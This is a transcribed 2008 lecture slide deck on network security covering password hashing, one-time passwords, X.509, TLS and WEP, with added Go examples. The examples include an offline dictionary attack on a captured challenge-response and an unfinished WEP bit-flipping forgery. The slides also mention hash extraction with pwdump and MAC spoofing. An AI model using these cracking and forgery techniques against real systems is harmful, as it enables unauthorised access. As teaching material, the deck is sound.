Solutions pour la Sécurité des réseaux (Network Security Solutions), Prof. Gildas Avoine, UCL Belgium. PowerPoint presentation given at the École Internationale de Printemps Systèmes Répartis METIS'2008 (Architecture, Sécurité & Fiabilité), Rabat, 20-23 May 2008.


SLIDE 1

École Internationale de Printemps Systèmes Répartis: METIS'2008, Architecture, Sécurité & Fiabilité (International Spring School on Distributed Systems: Architecture, Security & Reliability), Rabat, 20-23 May 2008

Prof. Gildas Avoine, UCL Belgium

Solutions pour la Sécurité des réseaux (Network Security Solutions)

SLIDE 2

Introduction

Confidentiality, Integrity, Authentication, Availability. Is security important, or just a toy for academia?

SLIDE 3

Gildas Avoine - UCL Belgium - 2008 INGI2347 - Introduction

SLIDE 8

Security Incident: A Real Issue

Incidents are real and have significant consequences: cost (direct and indirect), the company's image (reputation), and loss of competitive intelligence.

SLIDE 9

How to Manage Security

Locksmiths don't secure a building, architects do.

According to Thucydides: it is not the walls that protect the citadel, but the spirit of its inhabitants.

An attacker goes for the weakest link, so security is a property of the whole design, not of one component.

SLIDE 10

Our Focus

We focus on communication security:

Symmetric-key authentication
Public-key authentication
SSL/TLS (public key, many-to-one)
WEP (symmetric key, many-to-one)
Kerberos (symmetric key, many-to-many)
PGP (public key, many-to-many)

SLIDE 11

Symmetric-Key Authentication

Passwords
One-Time Passwords
Challenge-Response

SLIDE 12

Identification, Authentication

Identification: we identify a person or entity, that is, we receive the name it claims (the user tells us who they are).

Authentication: we obtain proof that the party we are talking to really is the one it claims to be.

Example, at logon: the username serves for identification, the password for authentication.

Authentication can rely on:

Something the user possesses (token).
Something the user is (biometrics).
Something the user knows (password, key).

SLIDE 13

Passwords vs Keys

Password: human-memorizable. Issue: weak entropy.

Keys: used by computers, not by humans. Issue: where to store them.

SLIDE 14

Pwd: Naïve Idea

The password file stores each user's password as such (123456, abc123, qwerty, ...). The user types 123456 and the system compares it with the stored value.

All passwords are revealed if the password file is stolen!

SLIDE 15

Password Storage

Passwords are never stored as such: the risk of theft would be too high. Instead of the password, we store a hash of it. The hash function must be resistant to first-preimage, second-preimage and collision attacks (ideally it behaves like a random oracle).

When logging in, the typed password is hashed and the result is compared with the stored hash.

(Figure: h(pwd) = hash, by analogy with E_key(plaintext) = ciphertext.)

Caveat: the schemes on the following slides hash the password alone, without a per-user salt, so two users with the same password get the same hash and a precomputed table works against every account at once.

SLIDE 16

Implemented Idea

The password file stores hashes (e.g. *%-=(+, +S%dc-, z5'0lé, ...). The user types 123456; the system hashes it and compares the result with the stored hash.

SLIDE 17

Win NT/2000/XP (NT Hash)

Windows NT/2000/XP uses the NT LAN Manager hash (aka NT hash, NTLM hash).

Passwords can be longer than 14 characters (but compatibility issues arise beyond 14 characters).

Lowercase letters are not converted to uppercase. The hash function is MD4, applied to the UTF-16LE encoding of the password, with no salt.

SLIDE 18

Win 9x Passwords (LM Hash)

Windows 95/98/ME uses the LAN Manager hash (LM hash). The password is padded with NUL bytes to 14 characters and cut into two blocks of 7 characters.

Lowercase letters are converted to uppercase. A separate hash is generated for each 7-char block: each 7-byte block is used as a DES key to encrypt the 8-byte constant string "KGS!@#$%":

0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25.

The two 8-byte results are concatenated into the 16-byte LM hash. Because the halves are independent, cracking a 14-character password costs no more than cracking two 7-character ones.
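The LM computation above, as an added worked example in Go (not code from the slides); it uses only the constant the slide gives and the standard library's DES. It assumes an ASCII password (real LM uses the OEM code page) and, following the later slides, returns no hash at all for passwords longer than 14 characters. The names LMHash and IsShortLM are mine.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the 8-byte constant "KGS!@#$%" listed on the slide.
var lmMagic = []byte{0x4B, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25}

// desKeyFrom7 spreads 56 key bits over 8 bytes, one 7-bit chunk per byte
// shifted left by one; DES ignores the low (parity) bit of every key byte.
func desKeyFrom7(k7 []byte) []byte {
	var bits uint64
	for _, b := range k7 {
		bits = bits<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		key[i] = byte(bits&0x7f) << 1
		bits >>= 7
	}
	return key
}

// lmHalf encrypts the constant under one 7-byte block used as DES key.
func lmHalf(block7 []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(block7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, lmMagic)
	return out
}

// LMHash: uppercase, pad with NULs to 14 bytes, split into two 7-byte
// halves, DES-encrypt the constant under each, concatenate. Returns
// ok=false for passwords longer than 14 characters, for which Windows
// stores no LM hash at all.
func LMHash(password string) (lmHex string, ok bool) {
	p := []byte(strings.ToUpper(password)) // ASCII assumed
	if len(p) > 14 {
		return "", false
	}
	p = append(p, bytes.Repeat([]byte{0}, 14-len(p))...)
	return hex.EncodeToString(append(lmHalf(p[:7]), lmHalf(p[7:14])...)), true
}

// IsShortLM reports whether the second half is the hash of an all-NUL
// block, i.e. the password has at most 7 characters.
func IsShortLM(lmHex string) bool {
	return len(lmHex) == 32 && lmHex[16:] == "aad3b435b51404ee"
}

func main() {
	for _, pw := range []string{"", "secret", "Secret", "MAISONT", "a much longer passphrase"} {
		h, ok := LMHash(pw)
		fmt.Printf("%-26q lm=%s stored=%v short=%v\n", pw, h, ok, IsShortLM(h))
	}
}
```

The second half aad3b435b51404ee is the DES encryption of the constant under an all-zero key, i.e. the hash of an empty block; seeing it in a dump tells the attacker the password has at most 7 characters, which is the first thing crackers test.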

SLIDE 20

LM Hash & NT Hash

By default, the LM hash and the NT hash are both stored on the computer for compatibility reasons.

We can deactivate the creation of the LM hash:

Requires modifying the registry (the NoLMHash setting).
Deactivated by default in Windows Vista.
Choosing a password longer than 14 characters also deactivates the LM hash.

SLIDE 21

Cracking a (the) Password(s)

Online attack: the system is used as an oracle (black box). Slow. How to avoid such an attack? (Rate limiting, lockout after a few failures.)

Offline attack: we recover the passwords offline. Requires stealing the hash file. How to avoid such an attack? (Protect the file; use a slow, salted hash.)

SLIDE 22

Storage

The hash file is encrypted, but by default the key can be extracted from the machine (on Windows, the SAM is encrypted with the SYSKEY, which is derivable from the registry hives).

If the machine is running, we need administrator privileges plus a dedicated tool (pwdump) to extract the hashes (Windows).

If we can boot another OS, we can copy and decrypt the hashes.

SLIDE 23

Weak Passwords

Password length distribution (source: www.schneier.com):

Length   Percent
1-4      0.82%
5        1.1%
6        15%
7        23%
8        25%
9        17%
10       13%
11       2.7%
12       0.93%
13-32    0.93%

Character composition: numbers only 1.3%, letters only 9.6%, alphanumeric 81%, containing non-alphanumeric characters 8.3%.

SLIDE 24

Dictionary Attacks

Based on common dictionary words, including dictionary words that have been altered:

Reversed (e.g., "terces")
Mixed case (e.g., "SeCreT")
Character/symbol replacement (e.g., "$ecret")
Words with vowels removed (e.g., "scrt")
Numbers concatenated to the word (e.g., "house123")

Also: based on common names; based on the user/account identifier; short (under 6 characters); based on keyboard patterns (e.g., "qwerty"); composed of a single symbol type (e.g., all letters); resembling license plate values.

SLIDE 25

Weak Passwords

"We used to quip that 'password' is the most common password. Now it's 'password1.' Who said users haven't learned anything about security?" (Schneier, 2006)

Top-used passwords are (in order): password1, abc123, myspace1, password, blink182, qwerty1, fuckyou, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1, monkey.

Source: www.schneier.com

SLIDE 26

Cracking Times

Exhaustive search time by character set and password length (figures from the slide, 2008 hardware):

Windows LM hash
Character set (example)    length 6    length 7    length 8
alpha (MAISONT)            77 s        33 m        33 m
alphanumeric (MAI2SON)     9 m         5 h         5 h
special (mAI-2On)          1.2 days    100 days    100 days

Unix crypt (56-bit DES)
Character set (example)    length 6    length 7    length 8
alpha (MAISONT)            77 s        33 m        14 days
alphanumeric (MAI2SON)     3.9 h       10 days     630 days
special (mAI-2On)          5.7 days    1.7 years   196 years

Note that for LM an 8-character password costs no more than a 7-character one: the eighth character sits alone in the second 7-byte block and is recovered instantly, so the effective search is always at most 7 uppercase characters.

SLIDE 27

Some Vulnerabilities

Written-down passwords. Shoulder surfing. Social engineering. Key loggers, rootkits. Eavesdropping on the network. The same password reused on several websites. Audit trails (passwords ending up in logs). Guessing the password (low entropy).

SLIDE 28

Alternative: One-Time Pwds

A chain of hashes is generated: h1 = H(seed), h2 = H(h1), ..., hn = H(hn-1). The last element (hn) is provided to the verifier. The prover keeps the chain (from h1). To authenticate, the prover sends hn-1 to the verifier, who checks that H(hn-1) = hn and then stores hn-1 for the next login (which will use hn-2).

Nobody is able to compute hn-1 from hn except the prover (preimage resistance), and a value already used is never accepted again.
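The hash chain above as an added example in Go (not from the slides), with SHA-256 as H. The verifier is enrolled with hn, accepts a login only if the hash of what it receives equals its stored value, and then stores the received value, so each element works exactly once. The seed and the chain length are constructed for the demo; RunSession, Verifier and Prover are my names.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
)

// hashChain computes h1 = H(seed), h2 = H(h1), ..., hn = H(hn-1).
// chain[0] is h1 and chain[n-1] is hn.
func hashChain(seed []byte, n int) [][]byte {
	chain := make([][]byte, n)
	cur := seed
	for i := range chain {
		d := sha256.Sum256(cur)
		cur = d[:]
		chain[i] = cur
	}
	return chain
}

// Verifier stores a single value: hn at enrolment, then the last accepted element.
type Verifier struct{ last []byte }

// Accept succeeds iff H(candidate) equals the stored value, then moves the
// stored value one step back, so the same candidate is never accepted twice.
func (v *Verifier) Accept(candidate []byte) bool {
	d := sha256.Sum256(candidate)
	if subtle.ConstantTimeCompare(d[:], v.last) != 1 {
		return false
	}
	v.last = candidate
	return true
}

// Prover walks the chain backwards: hn-1 first, then hn-2, down to h1.
type Prover struct {
	chain [][]byte
	next  int
}

func NewProver(chain [][]byte) *Prover { return &Prover{chain, len(chain) - 2} }

func (p *Prover) Next() ([]byte, bool) {
	if p.next < 0 {
		return nil, false // chain exhausted: re-enrol with a fresh seed
	}
	e := p.chain[p.next]
	p.next--
	return e, true
}

// RunSession enrols a chain of length n (constructed seed), logs in until the
// chain is exhausted, then checks that a replayed and a forged value are rejected.
func RunSession(seed string, n int) (logins int, replayRejected, forgedRejected bool) {
	chain := hashChain([]byte(seed), n)
	v := &Verifier{last: chain[n-1]}
	p := NewProver(chain)
	var lastSent []byte
	for {
		e, ok := p.Next()
		if !ok {
			break
		}
		if v.Accept(e) {
			logins++
		}
		lastSent = e
	}
	replayRejected = !v.Accept(lastSent)
	forged := sha256.Sum256([]byte("attacker guess"))
	forgedRejected = !v.Accept(forged[:])
	return
}

func main() {
	l, r, f := RunSession("enrolment seed (constructed)", 10)
	fmt.Printf("logins=%d replayRejected=%v forgedRejected=%v\n", l, r, f)
}
```

A passive eavesdropper learns nothing useful, since computing hn-2 from hn-1 needs a preimage. The scheme does not, by itself, protect against an active attacker who intercepts hn-1 and keeps it from reaching the verifier, then uses it herself, and the chain must be re-enrolled once h1 has been spent.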

SLIDE 29

Challenge-Response

A challenge c sent by the verifier is encrypted by the prover with a secret k: the prover returns Ek(c).

The secret never transits on the channel. The password is hashed to generate the key k.

Verifier -> Prover: c
Prover -> Verifier: Ek(c)
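The exchange above as an added example in Go (not from the slides): HMAC-SHA256 plays the role of Ek(c), and the key is the unsalted SHA-256 of the password as the slide describes. The dictionary is the list from the "Weak Passwords" slide; keyFromPassword, respond, verify and offlineGuess are my names. It also shows the check a practitioner wants: the secret never crosses the wire, but one captured (c, Ek(c)) pair is enough for an offline dictionary attack when the password is weak.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"fmt"
)

// keyFromPassword: the slide says the password is hashed to obtain the key.
// A plain unsalted SHA-256 is used on purpose: it is what makes the offline
// guessing below cheap (a slow, salted KDF is the mitigation).
func keyFromPassword(pw string) []byte {
	h := sha256.Sum256([]byte(pw))
	return h[:]
}

// newChallenge is the verifier's fresh random c for each attempt.
func newChallenge() []byte {
	c := make([]byte, 16)
	if _, err := rand.Read(c); err != nil {
		panic(err)
	}
	return c
}

// respond is the prover's E_k(c); HMAC-SHA256 stands in for the keyed
// function (a MAC is the usual modern choice over a block cipher).
func respond(key, challenge []byte) []byte {
	m := hmac.New(sha256.New, key)
	m.Write(challenge)
	return m.Sum(nil)
}

// verify recomputes the expected response and compares in constant time.
func verify(key, challenge, response []byte) bool {
	return subtle.ConstantTimeCompare(respond(key, challenge), response) == 1
}

// offlineGuess is the eavesdropper: with one captured (c, E_k(c)) pair she
// tests candidate passwords at her own pace, never talking to the verifier.
func offlineGuess(challenge, response []byte, dictionary []string) (string, bool) {
	for _, pw := range dictionary {
		if verify(keyFromPassword(pw), challenge, response) {
			return pw, true
		}
	}
	return "", false
}

// topPasswords: the list from the "Weak Passwords" slide, used as a toy dictionary.
var topPasswords = []string{"password1", "abc123", "myspace1", "password", "blink182",
	"qwerty1", "123abc", "baseball1", "football1", "123456", "soccer", "monkey1"}

func main() {
	key := keyFromPassword("football1")
	c := newChallenge()
	r := respond(key, c)
	fmt.Println("login accepted:", verify(key, c, r))
	fmt.Println("replaying r against a new challenge:", verify(key, newChallenge(), r))
	pw, found := offlineGuess(c, r, topPasswords)
	fmt.Printf("eavesdropper guessed %q: %v\n", pw, found)
}
```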

SLIDE 30

Public-Key Authentication

SLIDE 31

Certificate Primer

(Figure.) Gildas Avoine's certificate: identity data and Gildas's public key, signed by a trusted party. The trusted party's own certificate: its public key, signed by the trusted party above it. At the top, the root certificate: the root's public key, signed by the root itself.

SLIDE 32

X.509: Certificates in Practice

X.509: standard from the International Telecommunication Union (ITU), released in 1988, then profiled for the Internet by IETF RFC 2459 (and its updates, RFC 3280 and RFC 5280).

Three required fields:

TBS Certificate (TBS = "To Be Signed"): the useful payload of the certificate (see next slide).
Signature algorithm: identifier of the cryptographic algorithm used by the CA to sign this certificate.
Signature value: signature of the TBS part by the CA.

SLIDE 33

X.509: TBS Certificate

Serial number: unique number assigned by the CA to the certificate.
Issuer field: identifies the entity who has signed and issued the certificate.
Subject: identifies the entity associated with the public key (O: organization, C: country, OU: organizational unit, CN: common name, e.g. the DNS name, ST: state, L: city, etc.; no IP address in the CN).
Validity: not before, not after.
Subject Public Key Info: the public key and the algorithm with which the key is used (e.g., RSA, DSA, or DH).
Etc.

SLIDE 34

UCL Webmail (screenshot)

SLIDE 35

Root Certificate Example (screenshot)

SLIDE 36

Belgian Passport Certificate

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 10 (0xa)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=BE, O=Kingdom of Belgium, OU=Federal Public Service Foreign Affairs Belgium, CN=CSCAPKI_BE
        Validity
            Not Before: Apr 10 00:00:00 2006 GMT
            Not After : Jul 15 23:59:59 2011 GMT
        Subject: C=BE, O=Kingdom of Belgium, OU=Federal Public Service Foreign Affairs Belgium, CN=DSPKI_BE
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (2048 bit)
                Modulus (2048 bit):
                    00:8f:9c:2c:f8:05:b5:bd:ed:51:1a:9f:b0:57:6e:
                    86:53:07:46:ac:ab:b6:05:e7:d6:e8:a6:6a:7b:ba:
                    9b:27:aa:8a:9f:80:ec:87:b3:9d:68:b7:29:cb:b1:
                    df:de:5e:48:9e:34:21:9f:97:ea:98:7a:f7:f6:88:
                    1c:ca:a3:b1:3f:b2:d8:36:9a:06:0b:b3:f0:02:20:
                    ce:ff:a9:e2:12:00:b2:1d:71:df:3e:cc:64:83:e2:
                    f9:e8:30:15:a5:62:95:ab:8e:8c:ee:dc:73:9a:9f:
                    58:78:c9:38:fd:ae:7c:71:17:73:c8:64:23:d2:34:
                    99:58:ef:bc:ca:dc:e3:38:39:d4:30:16:c1:8e:52:
                    a9:b0:eb:7f:5f:06:65:02:bc:72:1e:eb:14:40:af:
                    39:20:25:48:cf:2f:8e:1b:4f:2e:d6:fb:49:b7:ab:
                    a3:e5:56:2e:31:a1:30:56:69:dc:4f:b4:d8:49:a4:
                    af:e6:0c:e8:65:df:58:d5:ee:7f:80:02:d5:35:63:
                    2a:14:81:0a:eb:7d:5e:17:f8:63:9a:67:28:b0:b8:
                    f4:39:0b:cb:91:63:4b:e3:14:e0:69:dd:dd:92:26:
                    b2:8b:a4:0c:4d:de:10:b8:96:2b:e7:f1:ac:2e:2f:
                    11:15:bd:13:1d:61:c4:bf:69:24:28:9f:67:dd:b6:
                    49:b5
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                keyid:00:84:19:14:B2:CE:7E:0A:DE:3A:26:F9:FD:DD:1F:F4:01:42:A8:0E
            X509v3 Key Usage: critical
                Digital Signature
    Signature Algorithm: sha1WithRSAEncryption
        5d:ed:53:da:14:3d:e2:ab:2d:41:3c:ea:bc:55:3b:78:2a:2c:
        8e:0b:54:74:af:bd:a9:e1:c5:92:a4:f0:db:a9:0b:7d:0c:96:
        …

The issuer CN CSCAPKI_BE is the country signing CA of the ICAO ePassport PKI; the subject CN DSPKI_BE is a document signer, whose only permitted key usage is digital signature.

SLIDE 37

Certification Authorities

Issuers of certificates found on web servers (percent of servers; source: www.securityspace.com):

Verisign                 29.25
GeoTrust (Equifax)       19.56
Thawte                   15.21
Comodo Limited            7.64
Starfield Technologies    2.76
Unknown                   1.85
Entrust.Net               1.61
AddTrust AB               1.51
SomeOrganization          1.22
SWsoft Inc                0.86
Chained SSL               0.85
Snake Oil Ltd             0.79

Verisign, GeoTrust and Thawte belong to the same group. Entries such as "Snake Oil Ltd" (the sample CA shipped with Apache mod_ssl) and "SomeOrganization" are self-signed default certificates, not real CAs.

SLIDE 38

Obtaining a Certificate

1. Each new participant must present himself.
2. The CA (physically) authenticates the participant.
3. It asks the participant to generate a public/private key pair (the private key never leaves the participant).
4. It creates a certificate with the participant's identity, his public key, an expiry date, etc., and the CA's signature.
5. It provides a copy of its own public key to the participant.
6. The new participant can communicate with all other participants who share a common "trusted ancestor".

SLIDE 39

Public-Key vs Sym-Key

Advantages? Drawbacks?

SLIDE 40

SSL/TLS

SLIDE 41

SSL Primer

Client-server communications: random client, corporate server.

Authentication of the server is based on a public key. Trusted third party: the certificate authority (CA).

(Figure: the threats on the client-server link are eavesdropping, a fake server, a fake client, and modification of the traffic.)

SLIDE 42

Secure Sockets Layer (SSL)

The most widely deployed security protocol in the world.

SSL was developed by Netscape to offer secure access to web servers (https).

History: SSL v1.0 was never publicly released. SSL v2.0 was released in 1995 (flawed). SSL v3.0 was released in 1996 and led to TLS 1.0 (1999).

SLIDE 43

Transport Layer Security

TLS is an IETF standard based on SSL v3.0:

Slight modifications compared to SSL v3.0.
TLS v1.0 and SSL v3.0 do not interoperate.
TLS v1.0 is sometimes called SSL v3.1.
TLS v1.0 is defined in RFC 2246.

Current approved version (at the time of the talk): TLS v1.1, released in 2006 as RFC 4346; it fixes the CBC padding-oracle vulnerability discovered by Vaudenay.

Next proposed version: TLS v1.2, draft expiring in September 2008 (it was published as RFC 5246 in August 2008; RFC 4492, cited on the original slide, is the elliptic-curve cipher-suite extension, not TLS 1.2).

SLIDE 44

SSL in the Layers

Application
SSL/TLS
Transport (TCP)
Network
Data Link
Physical

SLIDE 45

Applications

Either create a new protocol from an existing one, on a separate port:

Examples: HTTP (80) / HTTPS (443), FTP (21) / FTPS (990), SMTP (25) / SMTPS (465), POP3 (110) / POP3S (995), IMAP (143) / IMAPS (993).

Disadvantage: only clients supporting TLS can connect. Advantage: we are sure that the communication is secure.

Or extend a protocol to negotiate SSL/TLS:

Examples: (E)SMTP, POP3, IMAP; with the STARTTLS command the client can ask to switch to TLS.

Advantage: the client is not required to support TLS to use the service. Drawback: unless the client insists on TLS, an active attacker can strip the STARTTLS capability from the server's greeting and keep the session in the clear.

SLIDE 46

Example: Web

HTTPS: the use of TLS is not negotiable. It guarantees confidentiality of the transmitted data and authenticity (of the server, possibly of the client).

The server must have a certificate. The client can have one (e.g. eBanking).

SLIDE 47

TLS Layers

Handshake protocol: for initializing a session.
Change Cipher Spec protocol: for switching to the negotiated cryptographic algorithms.
Alert protocol: for managing warnings and fatal errors.
Application data protocol: for passing data from an application to the record layer transparently.
Record layer: processing the data (see next slide).

SLIDE 48

TLS Record Layer

Processing of data: fragmentation, compression (optional), authentication (MAC), encryption.

It delivers the processed fragments to the transport layer (TCP).

At the receiving end, the inverse operations are carried out.

SLIDE 49

Record Layer Summary

(Figure.) Application data is fragmented; each fragment gets a MAC; data and MAC are encrypted together; a record header is prepended to the encrypted block.

SLIDE 50

Encryption

Encryption is performed on compressed and authenticated records.

Block ciphers: DES (40 bits or 56 bits), 3DES, IDEA, RC2 (40 bits). Why a 40-bit key alternative? (The US export regulations of the 1990s.) AES (128 bits or 256 bits) in TLS v1.1.

Stream ciphers: NULL, RC4 (40 bits or 128 bits).

The client should refuse 40-bit keys if such a cipher is suggested by the server (this warning is enforced in TLS 1.1).

SLIDE 51

Handshake in Brief

Negotiation of:

The protocol version (SSL 3.0, TLS 1.0, TLS 1.1).
The algorithms: key exchange (RSA, Diffie-Hellman), encryption (DES, 3DES, IDEA, RC4, RC2, AES), MAC (HMAC-MD5, HMAC-SHA).

The client proposes the desired algorithms in order of preference, the server chooses.

Optional authentication of the partner using a certificate.

Handshake messages are not encrypted. The last messages (Finished) authenticate the whole exchange, so tampering with the negotiation is detected.

SLIDE 52

WEP

Introduction to WLAN
WEP Description
Attacks on WEP (Theory)
Attacks on WEP (Practice)

SLIDE 53

Infrastructure Mode

Access points connect to a wired network. Multiple mobile stations per access point.

Full internet connection for mobile users: university campus, coffee shops, airport lounges.

(Figure: mobile devices, access point (AP), wired network.)

SLIDE 54

Ad Hoc Mode

Wireless stations communicate directly, without a wired network.

On-the-fly networking: impromptu meetings, rescue operations.

Where LAN set-up is difficult: natural areas.

Where LAN set-up is dangerous: battlefield.

People are often not aware that they launch an ad hoc network, e.g. when searching for networks in a train.

SLIDE 55

Eavesdropping Range

Typical use indoors: ~30 m. Typical outdoor range with a suitable antenna: ~5 km. Record: 382 km by EsLaRed of Venezuela (2007).

SLIDE 56

War Driving

Just discovering WiFi networks, no unauthorized access.

To war-drive: laptop, 802.11 card, software, GPS, car.

While you drive, the software listens and builds a map of all WiFi networks found.

Examples: www.wigle.net, www.wardriving.com

SLIDE 57

Map of WiFi APs.

Source: www.wigle.net

SLIDE 58

Authentication, Encryption

Authentication: open systems; not broadcasting the AP's SSID; MAC address filter; WEP; WPA / WPA2.

Encryption: WEP; WPA / WPA2.

SLIDE 59

Authentication: Open Systems

No authentication at all. Less and less used?

Usually, providers impose authentication by default. Not the case with Belgacom (observed in 2007).

Public free hot spots without authentication. Non-free hot spots in hotels, train stations, etc., with higher-level authentication (e.g. a RADIUS server).

Communities sharing their access, e.g. Communauté Neuf Wifi.

What kind of problem do we face?

SLIDE 60

Authentication: AP's SSID

The AP broadcasts its SSID to allow clients to dynamically discover the AP.

Not broadcasting the SSID can be used to authenticate a client, since the client must then know the SSID. It is not secure, because the SSID can be eavesdropped when a legitimate client connects to the AP.

It can also be used to restrict features, e.g. Club Internet by default (observed in 2007): people pay to activate the wireless feature of their router.

A lack of broadcast can also be due to the channel number.

SLIDE 61

Authentication: AP's SSID

In practice, sniff the environment with e.g. Kismet, Airodump, NetStumbler (Windows), etc.

(Screenshot: Kismet in a Linux shell.)

SLIDE 62

Authentication: MAC Address

The router has a list of authorized MAC addresses and checks the MAC address of the station trying to connect to the network.

An attacker can read the MAC address of a legitimate wireless station (it is sent in the clear in every frame) and replace his own MAC address with the stolen one.
SLIDE 63

Authentication: MAC Address

(Screenshot: MAC addresses of the devices connected to the AP.)

SLIDE 64

WEP Features

Authentication ("shared key" user authentication).
Confidentiality (RC4 stream cipher encryption).
Integrity checking (CRC-32 integrity mechanism).
No key management.
No protection against replay attacks.

SLIDE 65

Authentication + Enc: WEP

WEP = Wired Equivalent Privacy, part of the 802.11 standard (1999). The stated goal of WEP is to make a wireless LAN as secure as a wired LAN.

According to Tanenbaum:

"The 802.11 standard prescribes a data link-level security protocol called WEP (Wired Equivalent Privacy), which is designed to make the security of a wireless LAN as good as that of a wired LAN. Since the default for a wired LAN is no security at all, this goal is easy to achieve, and WEP achieves it as we shall see."

SLIDE 66

No Key Management

No key management in WEP: every wireless station and AP has the same "preshared" key, used for both authentication and encryption. This key is distributed manually.

(Figure: the same Key A on every station and on the AP.)

SLIDE 67

No Key Management

In practice:

The key is loaded into the device by hand when it is set up.
Often the manufacturer's default is kept: printed under the router, in the user guide, etc.
Never updated again.

Same key for everybody: in a large network, users may wish to have independent secure connections; a single dishonest WLAN user can break the security for everyone.

Static key: since it is relatively easy to crack WEP encryption in a reasonably short time (see next slides), the keys should be changed often, but the preshared key concept does not support this.

Belgacom's default WEP keys... (64 bits)

SLIDE 68

Replay Attacks

The adversary can "replay" a packet she has already seen; WEP carries no sequence number, so the receiver cannot tell a replay from a fresh frame.

Solutions? (A per-packet counter checked by the receiver, as WPA's TKIP later introduced.)

SLIDE 69

Integrity

Integrity is ensured using a CRC. A CRC does not provide a cryptographic integrity check: it is designed to detect random errors, not intelligent changes.

In WEP, the CRC is appended to the message, then the whole is encrypted.

The encrypted message can be modified such that it is still valid after decryption.

SLIDE 70

WEP Authentication

Station -> AP: authentication request (MAC address).
AP -> Station: challenge (128 bytes).
Station -> AP: response (the challenge encrypted with WEP).
AP -> Station: status code.

Authentication is successful if WEP decryption of the response gives the original challenge text.

Caveat: an eavesdropper who captures one challenge and its encrypted response learns 128 bytes of keystream for that IV (plaintext XOR ciphertext) and can then answer any future challenge herself by reusing that IV.

SLIDE 71

Stream Cipher

(Figure.) The stream cipher expands the secret key into a keystream; ciphertext = plaintext XOR keystream, and decryption is the same XOR.

SLIDE 72

RC4 for WEP Encryption

(Figure.) The packet key is the 24-bit IV followed by the 40-bit secret key; RC4 expands it into a keystream; the plaintext with its checksum appended is XORed with the keystream; the IV is transmitted in the clear along with the ciphertext.

SLIDE 73

RC4: A Well-known Stream Cipher

Designed by Ron Rivest (MIT) in 1987 for RSA Labs.

Kept as a trade secret until 1994; publicly disclosed in September 1994 on the Cypherpunks mailing list.

Byte-oriented: generates one keystream byte per step.

Efficient in software (compared to LFSRs and block ciphers): encryption in software is about 10 times faster than DES. Simple and elegant.

Widely used: commercial software such as MS Office and Oracle Secure SQL; network protocols such as SSL, IPsec, WEP; copy protection inside the MS Xbox.

SLIDE 74

Attacks on RC4

Not under the spotlight as much as other stream ciphers. Theoretical attacks. Weak keys. To be used carefully:

Discard the first bytes of keystream (e.g. the first 768 bytes) to avoid some attacks.
Do not encrypt too long a stream, to avoid other attacks.
If plaintext and ciphertext are known, then the keystream is known. No problem if the keystream is not reused; if it is reused, this is at least as bad as reusing a one-time pad.

SLIDE 75

#1 Known-Plaintext Attack

WEP uses a 24-bit (3-byte) IV.

Each packet gets a new IV. RC4 packet key: the IV prepended to the long-term key K.

If the long-term key and the IV are the same, then the same keystream is used.

There is a 50% chance of IV reuse after about 2^12 (4,096) packets (birthday paradox over 2^24 IVs).

SLIDE 76

#1 Known-Plaintext Attack

The keystream leaks under a known-plaintext attack.

Suppose we intercept a ciphertext C and can guess the corresponding plaintext P. Let Z = RC4(K, IV) be the RC4 keystream. Since C = P ⊕ Z, we derive the keystream by P ⊕ C = P ⊕ (P ⊕ Z) = Z.

This is not a problem ... unless the keystream is reused!

SLIDE 77

#2 CRC Property

The CRC is a linear function with respect to XOR:

CRC(X ⊕ Y) = CRC(X) ⊕ CRC(Y)

The attacker observes (M | CRC(M)) ⊕ K, where K is the keystream output.

For any ∆M, the attacker can compute CRC(∆M). Hence the attacker can compute:

((M | CRC(M)) ⊕ K) ⊕ (∆M | CRC(∆M))
= ((M ⊕ ∆M) | (CRC(M) ⊕ CRC(∆M))) ⊕ K
= ((M ⊕ ∆M) | CRC(M ⊕ ∆M)) ⊕ K

which decrypts to a modified message with a valid checksum.

Example: modify an IP address.

Caveat: the identity above holds for a raw CRC. The standard CRC-32 used by WEP has an initial value and a final complement, which makes it affine rather than linear: CRC(X ⊕ Y) = CRC(X) ⊕ CRC(Y) ⊕ CRC(0...0) for equal-length inputs, so the checksum delta to apply is CRC(∆M) ⊕ CRC(0...0).
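The bit-flipping attack above as an added example in Go (not from the slides), using RC4 and the standard CRC-32 from the Go library. The key, IV and IPv4 header are constructed; wepEncrypt, wepDecrypt, flipBits and RedirectDemo are my names. Because WEP's CRC-32 is affine rather than purely linear, flipBits adds the CRC(0...0) term; calling RedirectDemo(false) shows what happens without it.

```go
package main

import (
	"crypto/rc4"
	"encoding/binary"
	"fmt"
	"hash/crc32"
	"net"
)

func le32(v uint32) []byte {
	b := make([]byte, 4)
	binary.LittleEndian.PutUint32(b, v)
	return b
}

// keystreamCipher builds RC4 for the packet key IV || K.
func keystreamCipher(K, iv []byte) *rc4.Cipher {
	c, err := rc4.NewCipher(append(append([]byte{}, iv...), K...))
	if err != nil {
		panic(err)
	}
	return c
}

// wepEncrypt produces the frame body (M || CRC32(M)) XOR RC4(IV || K).
func wepEncrypt(K, iv, msg []byte) []byte {
	body := append(append([]byte{}, msg...), le32(crc32.ChecksumIEEE(msg))...)
	keystreamCipher(K, iv).XORKeyStream(body, body)
	return body
}

// wepDecrypt is the receiver: strip the keystream, then check the ICV.
func wepDecrypt(K, iv, body []byte) (msg []byte, icvOK bool) {
	out := make([]byte, len(body))
	keystreamCipher(K, iv).XORKeyStream(out, body)
	n := len(out) - 4
	return out[:n], crc32.ChecksumIEEE(out[:n]) == binary.LittleEndian.Uint32(out[n:])
}

// flipBits is the attacker: XOR delta (same length as the message) into the
// ciphertext and fix the encrypted ICV without the key. The slide's identity
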